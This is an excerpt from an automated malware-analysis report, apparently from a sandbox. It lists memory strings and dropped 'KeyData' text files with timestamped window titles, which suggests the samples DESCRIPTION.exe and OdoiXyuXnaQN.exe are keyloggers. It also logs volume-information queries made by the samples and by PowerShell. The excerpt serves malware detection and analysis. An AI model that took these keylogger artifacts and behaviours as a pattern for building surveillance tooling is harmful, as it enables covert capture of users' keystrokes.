Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:09]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:18]<<Program Manager>/
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:17<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, KeyDatajGpJWZFT.txt.9.dr	Binary or memory string: [07:21:50]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 22:38]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 21:37]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:18]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:42]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2720460727.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, KeyDataUNWGMQvz.txt.9.dr	Binary or memory string: [07:22:34]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:18<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--1]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2720460727.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, KeyDataYRTmqAXe.txt.9.dr	Binary or memory string: [07:21:21]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:54]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:17]<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, KeyDataYRTmqAXe.txt.9.dr	Binary or memory string: [07:21:20]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2723224019.00000000055BE000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:13]<<Program Manager>>4
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:53]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 07:23:12]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2720460727.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, KeyDataUNWGMQvz.txt.9.dr	Binary or memory string: [07:22:29]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:21]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, KeyDataYRTmqAXe.txt.9.dr	Binary or memory string: [07:21:22]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:15]<<Program Manager>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:16]<<Program Manager>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:08]<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerogram Manager
Source: DESCRIPTION.exe, 00000009.00000002.2722864980.0000000005570000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:15]<<Program Manager>>3fbd04f5-b1ed-
Source: DESCRIPTION.exe, 00000009.00000002.2720460727.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, KeyDataUNWGMQvz.txt.9.dr	Binary or memory string: [07:22:28]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:52]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:18]<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:17]<<Program Manager
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:07]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:00]<<Program Manager>>
Source: KeyDataNErTutaN.txt.9.dr	Binary or memory string: [07:22:49]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:11]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:05]<<Program Manager>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:56]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:20]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:10]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:39]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:25Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 22:51]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:43]<<Program Manager>>t
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:03]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2730998097.00000000082C0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:05]<<Program Manager>>
Source: KeyDataNErTutaN.txt.9.dr	Binary or memory string: [07:22:48]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:55]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:12]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :10]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ThunderRT6PictureBoxDC44]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:38]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2722864980.0000000005570000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:15]<<Program Manager>>P
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :21:39]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, KeyDataWrlEoSmg.txt.9.dr	Binary or memory string: [07:22:47]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2730998097.00000000082C0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:04]<<Program Manager>>

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Users\user\Desktop\DESCRIPTION.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
